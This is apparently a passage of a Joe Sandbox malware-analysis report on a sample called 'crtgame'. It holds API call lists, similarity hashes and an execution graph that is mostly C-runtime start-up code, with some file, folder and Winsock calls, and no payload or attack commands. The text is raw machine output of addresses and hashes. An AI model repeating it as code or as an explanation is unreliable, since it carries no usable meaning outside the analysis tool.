                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                    • API String ID: 1646373207-3105848591
                                                                                    • Opcode ID: fd7c0e462cbbc13dc3104afae60c032d0db7a7a26e33d0b776a2fe485baad9f3
                                                                                    • Instruction ID: 0a12f4e0a457fd75e54004e1fe13d9292b3ad5ee8f8a66ed0c634b2074e57af1
                                                                                    • Opcode Fuzzy Hash: fd7c0e462cbbc13dc3104afae60c032d0db7a7a26e33d0b776a2fe485baad9f3
                                                                                    • Instruction Fuzzy Hash: 91C01270380A0166DA202FA20F09B26294C0B94B03F1A04BEAC89F40C1CEBCCA08902D
                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403834), ref: 004040BD
                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403834), ref: 004040E1
                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403834), ref: 004040FB
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403834), ref: 004041BC
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403834), ref: 004041D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 714016831-0
                                                                                    • Opcode ID: 1326177f1af03cc7b67246c1eb97589beecab0fa3316904429e1e159162eb5fe
                                                                                    • Instruction ID: 72305b1c6ee3ebb5b96cda59697c7b30ca10d898fd4ed66b6bda130c081df910
                                                                                    • Opcode Fuzzy Hash: 1326177f1af03cc7b67246c1eb97589beecab0fa3316904429e1e159162eb5fe
                                                                                    • Instruction Fuzzy Hash: 4A3106B0600702ABE3208F24DD48B6276E0EBD5754F10413AEA65BF7D1E778A8809B9C
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(?,00000000), ref: 0040648D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID: $
                                                                                    • API String ID: 1807457897-3032137957
                                                                                    • Opcode ID: c2d0a335d03f329941ba4b81d6dd3e3e8a08df66aa9961035346a9fe4a0d5305
                                                                                    • Instruction ID: 3d0151050a2cad6db625bead7b0d8e4ea389b69a7fce316a905a2e80243c5a15
                                                                                    • Opcode Fuzzy Hash: c2d0a335d03f329941ba4b81d6dd3e3e8a08df66aa9961035346a9fe4a0d5305
                                                                                    • Instruction Fuzzy Hash: 7B418D32014258AEEB218714EDD9BFB3F98EB06700F1505FAD58BF71D3C23949649B6A
                                                                                    APIs
                                                                                    • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F18
                                                                                    • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F4C
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F66
                                                                                    • HeapFree.KERNEL32(00000000,?,?,00000000,00403CB8,?,?,?,00000100,?,00000000), ref: 00403F7D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2080202252.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2080202252.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocHeap$FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3499195154-0
                                                                                    • Opcode ID: 8d702973578f7d89d234971eade15b21b0a6fc2314a6c92e3ffe01eebb0314cc
                                                                                    • Instruction ID: 24f0b30d018d5df833e0385571de57ef5827e536e69f65b6ec69a4ed7564f7a0
                                                                                    • Opcode Fuzzy Hash: 8d702973578f7d89d234971eade15b21b0a6fc2314a6c92e3ffe01eebb0314cc
                                                                                    • Instruction Fuzzy Hash: 39111670600245DFC720CF19EE85A227BB5FB887557200A3EE5A2F69F0C7709946CF08

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.5%
                                                                                    Total number of Nodes:711
                                                                                    Total number of Limit Nodes:35
                                                                                    execution_graph 16158 2c7e264 16159 2c7e25b SHGetSpecialFolderPathW 16158->16159 16161 2ca884c 16159->16161 16161->16161 16162 2c89c0c 16163 2ce1a05 CreateFileA 16162->16163 16164 2c4104d 16169 2c52da4 16164->16169 16175 2c52ca8 16169->16175 16171 2c41057 16172 2c41aa9 InterlockedIncrement 16171->16172 16173 2c41ac5 WSAStartup InterlockedExchange 16172->16173 16174 2c4105c 16172->16174 16173->16174 16176 2c52cb4 ___BuildCatchObject 16175->16176 16183 2c57f92 16176->16183 16182 2c52cdb ___BuildCatchObject 16182->16171 16200 2c582ef 16183->16200 16185 2c52cbd 16186 2c52cec RtlDecodePointer RtlDecodePointer 16185->16186 16187 2c52d19 16186->16187 16188 2c52cc9 16186->16188 16187->16188 16499 2c58b5d 16187->16499 16197 2c52ce6 16188->16197 16190 2c52d7c RtlEncodePointer RtlEncodePointer 16190->16188 16191 2c52d50 16191->16188 16194 2c584fd __realloc_crt 62 API calls 16191->16194 16195 2c52d6a RtlEncodePointer 16191->16195 16192 2c52d2b 16192->16190 16192->16191 16506 2c584fd 16192->16506 16196 2c52d64 16194->16196 16195->16190 16196->16188 16196->16195 16533 2c57f9b 16197->16533 16201 2c58300 16200->16201 16202 2c58313 RtlEnterCriticalSection 16200->16202 16207 2c58377 16201->16207 16202->16185 16204 2c58306 16204->16202 16229 2c57e3f 16204->16229 16208 2c58383 ___BuildCatchObject 16207->16208 16222 2c583a2 16208->16222 16236 2c580d5 16208->16236 16214 2c583c0 16288 2c5585b 16214->16288 16215 2c583cf 16219 2c582ef __lock 59 API calls 16215->16219 16216 2c583c5 ___BuildCatchObject 16216->16204 16217 2c58398 16280 2c57d1c 16217->16280 16221 2c583d6 16219->16221 16223 2c583e3 16221->16223 16224 2c583fb 16221->16224 16222->16216 16283 2c584b6 16222->16283 16291 2c58c0c 16223->16291 16294 2c52974 16224->16294 16227 2c583ef 16300 2c58417 16227->16300 16230 2c580d5 __FF_MSGBANNER 59 API calls 16229->16230 16231 2c57e47 16230->16231 16232 2c58132 __NMSG_WRITE 59 API calls 16231->16232 16233 2c57e4f 16232->16233 16469 2c57eee 16233->16469 16303 2c5fb7e 16236->16303 16238 2c580dc 16239 2c5fb7e __NMSG_WRITE 59 API calls 16238->16239 16241 2c580e9 16238->16241 16239->16241 16240 2c58132 __NMSG_WRITE 59 API calls 16242 2c58101 16240->16242 16241->16240 16243 2c5810b 16241->16243 16244 2c58132 __NMSG_WRITE 59 API calls 16242->16244 16245 2c58132 16243->16245 16244->16243 16246 2c58150 __NMSG_WRITE 16245->16246 16248 2c5fb7e __NMSG_WRITE 55 API calls 16246->16248 16279 2c58277 16246->16279 16249 2c58163 16248->16249 16251 2c5827c GetStdHandle 16249->16251 16252 2c5fb7e __NMSG_WRITE 55 API calls 16249->16252 16250 2c582e0 16250->16217 16255 2c5828a _vscan_fn 16251->16255 16251->16279 16253 2c58174 16252->16253 16253->16251 16254 2c58186 16253->16254 16254->16279 16325 2c5ef3d 16254->16325 16257 2c582c3 WriteFile 16255->16257 16255->16279 16257->16279 16259 2c582e4 16262 2c54905 __invoke_watson 8 API calls 16259->16262 16260 2c581b3 GetModuleFileNameW 16261 2c581d3 16260->16261 16266 2c581e3 __NMSG_WRITE 16260->16266 16263 2c5ef3d __NMSG_WRITE 55 API calls 16261->16263 16264 2c582ee 16262->16264 16263->16266 16267 2c58313 RtlEnterCriticalSection 16264->16267 16268 2c58377 __mtinitlocknum 55 API calls 16264->16268 16265 2c58229 16265->16259 16343 2c5eed1 16265->16343 16266->16259 16266->16265 16334 2c5efb2 16266->16334 16267->16217 16270 2c58306 16268->16270 16270->16267 16273 2c57e3f __amsg_exit 55 API calls 16270->16273 16275 2c58312 16273->16275 16274 2c5eed1 __NMSG_WRITE 55 API calls 16276 2c58260 16274->16276 16275->16267 16276->16259 16277 2c58267 16276->16277 16352 2c5fbbe RtlEncodePointer 16277->16352 16377 2c53f4b 16279->16377 16392 2c57ce8 GetModuleHandleExW 16280->16392 16285 2c584c4 16283->16285 16286 2c583b9 16285->16286 16395 2c529ac 16285->16395 16412 2c58f05 Sleep 16285->16412 16286->16214 16286->16215 16415 2c55672 GetLastError 16288->16415 16290 2c55860 16290->16216 16292 2c58c29 InitializeCriticalSectionAndSpinCount 16291->16292 16293 2c58c1c 16291->16293 16292->16227 16293->16227 16295 2c5297d HeapFree 16294->16295 16296 2c529a6 __dosmaperr 16294->16296 16295->16296 16297 2c52992 16295->16297 16296->16227 16298 2c5585b __ungetc_nolock 57 API calls 16297->16298 16299 2c52998 GetLastError 16298->16299 16299->16296 16468 2c58459 RtlLeaveCriticalSection 16300->16468 16302 2c5841e 16302->16216 16304 2c5fb88 16303->16304 16305 2c5585b __ungetc_nolock 59 API calls 16304->16305 16306 2c5fb92 16304->16306 16307 2c5fbae 16305->16307 16306->16238 16310 2c548f5 16307->16310 16313 2c548ca RtlDecodePointer 16310->16313 16314 2c548dd 16313->16314 16319 2c54905 IsProcessorFeaturePresent 16314->16319 16317 2c548ca __ungetc_nolock 8 API calls 16318 2c54901 16317->16318 16318->16238 16320 2c54910 16319->16320 16321 2c54798 __call_reportfault 7 API calls 16320->16321 16322 2c54925 16321->16322 16323 2c58f13 ___raise_securityfailure GetCurrentProcess TerminateProcess 16322->16323 16324 2c548f4 16323->16324 16324->16317 16326 2c5ef48 16325->16326 16327 2c5ef56 16325->16327 16326->16327 16329 2c5ef6f 16326->16329 16328 2c5585b __ungetc_nolock 59 API calls 16327->16328 16333 2c5ef60 16328->16333 16331 2c581a6 16329->16331 16332 2c5585b __ungetc_nolock 59 API calls 16329->16332 16330 2c548f5 __ungetc_nolock 9 API calls 16330->16331 16331->16259 16331->16260 16332->16333 16333->16330 16335 2c5efc0 16334->16335 16337 2c5efc9 16335->16337 16339 2c5efc4 16335->16339 16341 2c5f003 16335->16341 16336 2c5585b __ungetc_nolock 59 API calls 16338 2c5eff4 16336->16338 16337->16265 16340 2c548f5 __ungetc_nolock 9 API calls 16338->16340 16339->16336 16339->16337 16340->16337 16341->16337 16342 2c5585b __ungetc_nolock 59 API calls 16341->16342 16342->16338 16345 2c5eedd 16343->16345 16346 2c5eeeb 16343->16346 16344 2c5585b __ungetc_nolock 59 API calls 16347 2c5eef5 16344->16347 16345->16346 16350 2c5ef17 16345->16350 16346->16344 16348 2c548f5 __ungetc_nolock 9 API calls 16347->16348 16349 2c58249 16348->16349 16349->16259 16349->16274 16350->16349 16351 2c5585b __ungetc_nolock 59 API calls 16350->16351 16351->16347 16353 2c5fbf2 ___crtIsPackagedApp 16352->16353 16354 2c5fcb1 IsDebuggerPresent 16353->16354 16355 2c5fc01 LoadLibraryExW 16353->16355 16356 2c5fcd6 16354->16356 16357 2c5fcbb 16354->16357 16358 2c5fc3e GetProcAddress 16355->16358 16359 2c5fc18 GetLastError 16355->16359 16361 2c5fcc9 16356->16361 16362 2c5fcdb RtlDecodePointer 16356->16362 16360 2c5fcc2 OutputDebugStringW 16357->16360 16357->16361 16364 2c5fc52 7 API calls 16358->16364 16365 2c5fcce 16358->16365 16363 2c5fc27 LoadLibraryExW 16359->16363 16359->16365 16360->16361 16361->16365 16371 2c5fd02 RtlDecodePointer RtlDecodePointer 16361->16371 16376 2c5fd1a 16361->16376 16362->16365 16363->16358 16363->16365 16366 2c5fcae 16364->16366 16367 2c5fc9a GetProcAddress RtlEncodePointer 16364->16367 16368 2c53f4b __87except 6 API calls 16365->16368 16366->16354 16367->16366 16372 2c5fda0 16368->16372 16369 2c5fd3e RtlDecodePointer 16369->16365 16370 2c5fd52 RtlDecodePointer 16370->16369 16373 2c5fd59 16370->16373 16371->16376 16372->16279 16373->16369 16375 2c5fd6a RtlDecodePointer 16373->16375 16375->16369 16376->16369 16376->16370 16378 2c53f55 IsProcessorFeaturePresent 16377->16378 16379 2c53f53 16377->16379 16381 2c58f8f 16378->16381 16379->16250 16384 2c58f3e IsDebuggerPresent 16381->16384 16385 2c58f53 ___raise_securityfailure 16384->16385 16390 2c58f28 SetUnhandledExceptionFilter UnhandledExceptionFilter 16385->16390 16387 2c58f5b ___raise_securityfailure 16391 2c58f13 GetCurrentProcess TerminateProcess 16387->16391 16389 2c58f78 16389->16250 16390->16387 16391->16389 16393 2c57d01 GetProcAddress 16392->16393 16394 2c57d13 ExitProcess 16392->16394 16393->16394 16396 2c52a27 16395->16396 16403 2c529b8 16395->16403 16397 2c57c03 __calloc_impl RtlDecodePointer 16396->16397 16398 2c52a2d 16397->16398 16399 2c5585b __ungetc_nolock 58 API calls 16398->16399 16411 2c52a1f 16399->16411 16400 2c580d5 __FF_MSGBANNER 58 API calls 16409 2c529c3 16400->16409 16401 2c529eb RtlAllocateHeap 16401->16403 16401->16411 16402 2c58132 __NMSG_WRITE 58 API calls 16402->16409 16403->16401 16404 2c52a13 16403->16404 16408 2c52a11 16403->16408 16403->16409 16413 2c57c03 RtlDecodePointer 16403->16413 16406 2c5585b __ungetc_nolock 58 API calls 16404->16406 16406->16408 16407 2c57d1c __mtinitlocknum 3 API calls 16407->16409 16410 2c5585b __ungetc_nolock 58 API calls 16408->16410 16409->16400 16409->16402 16409->16403 16409->16407 16410->16411 16411->16285 16412->16285 16414 2c57c16 16413->16414 16414->16403 16429 2c58bcb 16415->16429 16417 2c55687 16418 2c556d5 SetLastError 16417->16418 16432 2c5846e 16417->16432 16418->16290 16422 2c556ae 16423 2c556b4 16422->16423 16424 2c556cc 16422->16424 16441 2c556e1 16423->16441 16426 2c52974 ___crtGetEnvironmentStringsA 56 API calls 16424->16426 16428 2c556d2 16426->16428 16427 2c556bc GetCurrentThreadId 16427->16418 16428->16418 16430 2c58be2 TlsGetValue 16429->16430 16431 2c58bde 16429->16431 16430->16417 16431->16417 16435 2c58475 16432->16435 16434 2c5569a 16434->16418 16438 2c58bea 16434->16438 16435->16434 16437 2c58493 16435->16437 16451 2c5feb8 16435->16451 16437->16434 16437->16435 16459 2c58f05 Sleep 16437->16459 16439 2c58c04 TlsSetValue 16438->16439 16440 2c58c00 16438->16440 16439->16422 16440->16422 16442 2c556ed ___BuildCatchObject 16441->16442 16443 2c582ef __lock 59 API calls 16442->16443 16444 2c5572a 16443->16444 16460 2c55782 16444->16460 16447 2c582ef __lock 59 API calls 16448 2c5574b ___addlocaleref 16447->16448 16463 2c5578b 16448->16463 16450 2c55776 ___BuildCatchObject 16450->16427 16452 2c5fec3 16451->16452 16456 2c5fede 16451->16456 16453 2c5fecf 16452->16453 16452->16456 16454 2c5585b __ungetc_nolock 58 API calls 16453->16454 16457 2c5fed4 16454->16457 16455 2c5feee RtlAllocateHeap 16455->16456 16455->16457 16456->16455 16456->16457 16458 2c57c03 __calloc_impl RtlDecodePointer 16456->16458 16457->16435 16458->16456 16459->16437 16466 2c58459 RtlLeaveCriticalSection 16460->16466 16462 2c55744 16462->16447 16467 2c58459 RtlLeaveCriticalSection 16463->16467 16465 2c55792 16465->16450 16466->16462 16467->16465 16468->16302 16472 2c57fa6 16469->16472 16471 2c57e5a 16473 2c57fb2 ___BuildCatchObject 16472->16473 16474 2c582ef __lock 52 API calls 16473->16474 16475 2c57fb9 16474->16475 16477 2c57fe7 RtlDecodePointer 16475->16477 16478 2c58072 __cinit 16475->16478 16477->16478 16479 2c57ffe RtlDecodePointer 16477->16479 16492 2c580c0 16478->16492 16485 2c5800e 16479->16485 16481 2c580cf ___BuildCatchObject 16481->16471 16483 2c5801b RtlEncodePointer 16483->16485 16484 2c580b7 16486 2c580c0 16484->16486 16487 2c57d1c __mtinitlocknum 3 API calls 16484->16487 16485->16478 16485->16483 16488 2c5802b RtlDecodePointer RtlEncodePointer 16485->16488 16489 2c580cd 16486->16489 16497 2c58459 RtlLeaveCriticalSection 16486->16497 16487->16486 16491 2c5803d RtlDecodePointer RtlDecodePointer 16488->16491 16489->16471 16491->16485 16493 2c580c6 16492->16493 16494 2c580a0 16492->16494 16498 2c58459 RtlLeaveCriticalSection 16493->16498 16494->16481 16496 2c58459 RtlLeaveCriticalSection 16494->16496 16496->16484 16497->16489 16498->16494 16500 2c58b66 16499->16500 16501 2c58b7b RtlSizeHeap 16499->16501 16502 2c5585b __ungetc_nolock 59 API calls 16500->16502 16501->16192 16503 2c58b6b 16502->16503 16504 2c548f5 __ungetc_nolock 9 API calls 16503->16504 16505 2c58b76 16504->16505 16505->16192 16509 2c58504 16506->16509 16508 2c58541 16508->16191 16509->16508 16511 2c5fda4 16509->16511 16532 2c58f05 Sleep 16509->16532 16512 2c5fdad 16511->16512 16513 2c5fdb8 16511->16513 16514 2c529ac _malloc 59 API calls 16512->16514 16515 2c5fdc0 16513->16515 16523 2c5fdcd 16513->16523 16516 2c5fdb5 16514->16516 16517 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16515->16517 16516->16509 16527 2c5fdc8 __dosmaperr 16517->16527 16518 2c5fe05 16520 2c57c03 __calloc_impl RtlDecodePointer 16518->16520 16519 2c5fdd5 RtlReAllocateHeap 16519->16523 16519->16527 16521 2c5fe0b 16520->16521 16524 2c5585b __ungetc_nolock 59 API calls 16521->16524 16522 2c5fe35 16526 2c5585b __ungetc_nolock 59 API calls 16522->16526 16523->16518 16523->16519 16523->16522 16525 2c57c03 __calloc_impl RtlDecodePointer 16523->16525 16529 2c5fe1d 16523->16529 16524->16527 16525->16523 16528 2c5fe3a GetLastError 16526->16528 16527->16509 16528->16527 16530 2c5585b __ungetc_nolock 59 API calls 16529->16530 16531 2c5fe22 GetLastError 16530->16531 16531->16527 16532->16509 16536 2c58459 RtlLeaveCriticalSection 16533->16536 16535 2c52ceb 16535->16182 16536->16535 16537 2c5370f 16538 2c5371d 16537->16538 16539 2c53718 16537->16539 16543 2c53732 16538->16543 16551 2c5b2e4 16539->16551 16542 2c5372b 16544 2c5373e ___BuildCatchObject 16543->16544 16548 2c5378c ___DllMainCRTStartup 16544->16548 16550 2c537e9 ___BuildCatchObject 16544->16550 16555 2c5359d 16544->16555 16546 2c537c6 16547 2c5359d __CRT_INIT@12 138 API calls 16546->16547 16546->16550 16547->16550 16548->16546 16549 2c5359d __CRT_INIT@12 138 API calls 16548->16549 16548->16550 16549->16546 16550->16542 16552 2c5b314 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16551->16552 16553 2c5b307 16551->16553 16554 2c5b30b 16552->16554 16553->16552 16553->16554 16554->16538 16556 2c535a9 ___BuildCatchObject 16555->16556 16557 2c535b1 16556->16557 16558 2c5362b 16556->16558 16603 2c57be6 GetProcessHeap 16557->16603 16560 2c53694 16558->16560 16561 2c5362f 16558->16561 16563 2c536f7 16560->16563 16564 2c53699 16560->16564 16566 2c53650 16561->16566 16596 2c535ba ___BuildCatchObject __CRT_INIT@12 16561->16596 16704 2c57e5b 16561->16704 16562 2c535b6 16562->16596 16604 2c55794 16562->16604 16563->16596 16735 2c55624 16563->16735 16565 2c58bcb __freeptd TlsGetValue 16564->16565 16569 2c536a4 16565->16569 16707 2c57d32 RtlDecodePointer 16566->16707 16574 2c5846e __calloc_crt 59 API calls 16569->16574 16569->16596 16572 2c535c6 __RTC_Initialize 16580 2c535d6 GetCommandLineA 16572->16580 16572->16596 16576 2c536b5 16574->16576 16575 2c53666 __CRT_INIT@12 16731 2c5367f 16575->16731 16581 2c58bea __freeptd TlsSetValue 16576->16581 16576->16596 16577 2c5af7f __ioterm 60 API calls 16579 2c53661 16577->16579 16582 2c5580a __mtterm 62 API calls 16579->16582 16625 2c5b380 GetEnvironmentStringsW 16580->16625 16584 2c536cd 16581->16584 16582->16575 16586 2c536d3 16584->16586 16587 2c536eb 16584->16587 16589 2c556e1 __initptd 59 API calls 16586->16589 16590 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16587->16590 16593 2c536db GetCurrentThreadId 16589->16593 16590->16596 16591 2c535f0 16592 2c535f4 16591->16592 16657 2c5afd4 16591->16657 16690 2c5580a 16592->16690 16593->16596 16596->16548 16598 2c53614 16598->16596 16699 2c5af7f 16598->16699 16603->16562 16743 2c57f02 RtlEncodePointer 16604->16743 16606 2c55799 16748 2c58420 16606->16748 16609 2c557a2 16611 2c5580a __mtterm 62 API calls 16609->16611 16613 2c557a7 16611->16613 16613->16572 16614 2c557bf 16615 2c5846e __calloc_crt 59 API calls 16614->16615 16616 2c557cc 16615->16616 16617 2c55801 16616->16617 16618 2c58bea __freeptd TlsSetValue 16616->16618 16619 2c5580a __mtterm 62 API calls 16617->16619 16620 2c557e0 16618->16620 16621 2c55806 16619->16621 16620->16617 16622 2c557e6 16620->16622 16621->16572 16623 2c556e1 __initptd 59 API calls 16622->16623 16624 2c557ee GetCurrentThreadId 16623->16624 16624->16572 16626 2c5b393 WideCharToMultiByte 16625->16626 16627 2c535e6 16625->16627 16629 2c5b3c6 16626->16629 16630 2c5b3fd FreeEnvironmentStringsW 16626->16630 16638 2c5accb 16627->16638 16631 2c584b6 __malloc_crt 59 API calls 16629->16631 16630->16627 16632 2c5b3cc 16631->16632 16632->16630 16633 2c5b3d3 WideCharToMultiByte 16632->16633 16634 2c5b3f2 FreeEnvironmentStringsW 16633->16634 16635 2c5b3e9 16633->16635 16634->16627 16636 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16635->16636 16637 2c5b3ef 16636->16637 16637->16634 16639 2c5acd7 ___BuildCatchObject 16638->16639 16640 2c582ef __lock 59 API calls 16639->16640 16641 2c5acde 16640->16641 16642 2c5846e __calloc_crt 59 API calls 16641->16642 16643 2c5acef 16642->16643 16644 2c5ad5a GetStartupInfoW 16643->16644 16645 2c5acfa ___BuildCatchObject @_EH4_CallFilterFunc@8 16643->16645 16651 2c5ad6f 16644->16651 16654 2c5ae9e 16644->16654 16645->16591 16646 2c5af66 16756 2c5af76 16646->16756 16648 2c5846e __calloc_crt 59 API calls 16648->16651 16649 2c5aeeb GetStdHandle 16649->16654 16650 2c5aefe GetFileType 16650->16654 16651->16648 16653 2c5adbd 16651->16653 16651->16654 16652 2c5adf1 GetFileType 16652->16653 16653->16652 16653->16654 16655 2c58c0c __mtinitlocks InitializeCriticalSectionAndSpinCount 16653->16655 16654->16646 16654->16649 16654->16650 16656 2c58c0c __mtinitlocks InitializeCriticalSectionAndSpinCount 16654->16656 16655->16653 16656->16654 16658 2c5afe7 GetModuleFileNameA 16657->16658 16659 2c5afe2 16657->16659 16661 2c5b014 16658->16661 16766 2c54c8a 16659->16766 16760 2c5b087 16661->16760 16663 2c53600 16663->16598 16668 2c5b203 16663->16668 16665 2c584b6 __malloc_crt 59 API calls 16666 2c5b04d 16665->16666 16666->16663 16667 2c5b087 _parse_cmdline 59 API calls 16666->16667 16667->16663 16669 2c5b20c 16668->16669 16671 2c5b211 _vscan_fn 16668->16671 16670 2c54c8a ___initmbctable 71 API calls 16669->16670 16670->16671 16672 2c5846e __calloc_crt 59 API calls 16671->16672 16675 2c53609 16671->16675 16677 2c5b247 _vscan_fn 16672->16677 16673 2c5b299 16674 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16673->16674 16674->16675 16675->16598 16684 2c57e6a 16675->16684 16676 2c5846e __calloc_crt 59 API calls 16676->16677 16677->16673 16677->16675 16677->16676 16678 2c5b2c0 16677->16678 16681 2c5b2d7 16677->16681 16970 2c566bc 16677->16970 16680 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16678->16680 16680->16675 16682 2c54905 __invoke_watson 8 API calls 16681->16682 16683 2c5b2e3 16682->16683 16686 2c57e76 __IsNonwritableInCurrentImage 16684->16686 16979 2c5ccdf 16686->16979 16687 2c57e94 __initterm_e 16688 2c52da4 __cinit 68 API calls 16687->16688 16689 2c57eb3 __cinit __IsNonwritableInCurrentImage 16687->16689 16688->16689 16689->16598 16691 2c55814 16690->16691 16693 2c5581a 16690->16693 16982 2c58bac 16691->16982 16694 2c58339 RtlDeleteCriticalSection 16693->16694 16695 2c58355 16693->16695 16696 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16694->16696 16697 2c58361 RtlDeleteCriticalSection 16695->16697 16698 2c58374 16695->16698 16696->16693 16697->16695 16698->16596 16702 2c5af86 16699->16702 16700 2c5afce 16700->16592 16701 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16701->16702 16702->16700 16702->16701 16703 2c5af9f RtlDeleteCriticalSection 16702->16703 16703->16702 16705 2c57fa6 _doexit 59 API calls 16704->16705 16706 2c57e66 16705->16706 16706->16566 16708 2c57d5e 16707->16708 16709 2c57d4c 16707->16709 16710 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16708->16710 16709->16708 16712 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16709->16712 16711 2c57d6b 16710->16711 16713 2c57d8f 16711->16713 16715 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16711->16715 16712->16709 16714 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16713->16714 16716 2c57d9b 16714->16716 16715->16711 16717 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16716->16717 16718 2c57dac 16717->16718 16719 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16718->16719 16720 2c57db7 16719->16720 16721 2c57ddc RtlEncodePointer 16720->16721 16724 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16720->16724 16722 2c57df1 16721->16722 16723 2c57df7 16721->16723 16725 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16722->16725 16726 2c57e0d 16723->16726 16728 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16723->16728 16727 2c57ddb 16724->16727 16725->16723 16729 2c53655 16726->16729 16730 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16726->16730 16727->16721 16728->16726 16729->16575 16729->16577 16730->16729 16732 2c53691 16731->16732 16733 2c53683 16731->16733 16732->16596 16733->16732 16734 2c5580a __mtterm 62 API calls 16733->16734 16734->16732 16736 2c55631 16735->16736 16742 2c55657 16735->16742 16737 2c58bcb __freeptd TlsGetValue 16736->16737 16739 2c5563f 16736->16739 16737->16739 16738 2c58bea __freeptd TlsSetValue 16740 2c5564f 16738->16740 16739->16738 16985 2c554ef 16740->16985 16742->16596 16744 2c57f13 __init_pointers __initp_misc_winsig 16743->16744 16755 2c53407 RtlEncodePointer 16744->16755 16746 2c57f2b __init_pointers 16747 2c58c7a 34 API calls 16746->16747 16747->16606 16749 2c5842c 16748->16749 16750 2c58c0c __mtinitlocks InitializeCriticalSectionAndSpinCount 16749->16750 16751 2c5579e 16749->16751 16750->16749 16751->16609 16752 2c58b8e 16751->16752 16753 2c58ba5 TlsAlloc 16752->16753 16754 2c557b4 16752->16754 16754->16609 16754->16614 16755->16746 16759 2c58459 RtlLeaveCriticalSection 16756->16759 16758 2c5af7d 16758->16645 16759->16758 16762 2c5b0a9 16760->16762 16765 2c5b10d 16762->16765 16770 2c60fd6 16762->16770 16763 2c5b02a 16763->16663 16763->16665 16764 2c60fd6 _parse_cmdline 59 API calls 16764->16765 16765->16763 16765->16764 16767 2c54c9a 16766->16767 16768 2c54c93 16766->16768 16767->16658 16858 2c54fe7 16768->16858 16773 2c60f7c 16770->16773 16776 2c51c7b 16773->16776 16777 2c51cd9 16776->16777 16778 2c51c8c 16776->16778 16777->16762 16784 2c5565a 16778->16784 16781 2c51cb9 16781->16777 16804 2c54f41 16781->16804 16785 2c55672 __getptd_noexit 59 API calls 16784->16785 16786 2c55660 16785->16786 16787 2c51c92 16786->16787 16788 2c57e3f __amsg_exit 59 API calls 16786->16788 16787->16781 16789 2c54bbf 16787->16789 16788->16787 16790 2c54bcb ___BuildCatchObject 16789->16790 16791 2c5565a ___InternalCxxFrameHandler 59 API calls 16790->16791 16792 2c54bd4 16791->16792 16793 2c54c03 16792->16793 16795 2c54be7 16792->16795 16794 2c582ef __lock 59 API calls 16793->16794 16796 2c54c0a 16794->16796 16797 2c5565a ___InternalCxxFrameHandler 59 API calls 16795->16797 16816 2c54c3f 16796->16816 16801 2c54bec 16797->16801 16802 2c54bfa ___BuildCatchObject 16801->16802 16803 2c57e3f __amsg_exit 59 API calls 16801->16803 16802->16781 16803->16802 16805 2c54f4d ___BuildCatchObject 16804->16805 16806 2c5565a ___InternalCxxFrameHandler 59 API calls 16805->16806 16807 2c54f57 16806->16807 16808 2c582ef __lock 59 API calls 16807->16808 16809 2c54f69 16807->16809 16814 2c54f87 16808->16814 16810 2c54f77 ___BuildCatchObject 16809->16810 16812 2c57e3f __amsg_exit 59 API calls 16809->16812 16810->16777 16811 2c54fb4 16854 2c54fde 16811->16854 16812->16810 16814->16811 16815 2c52974 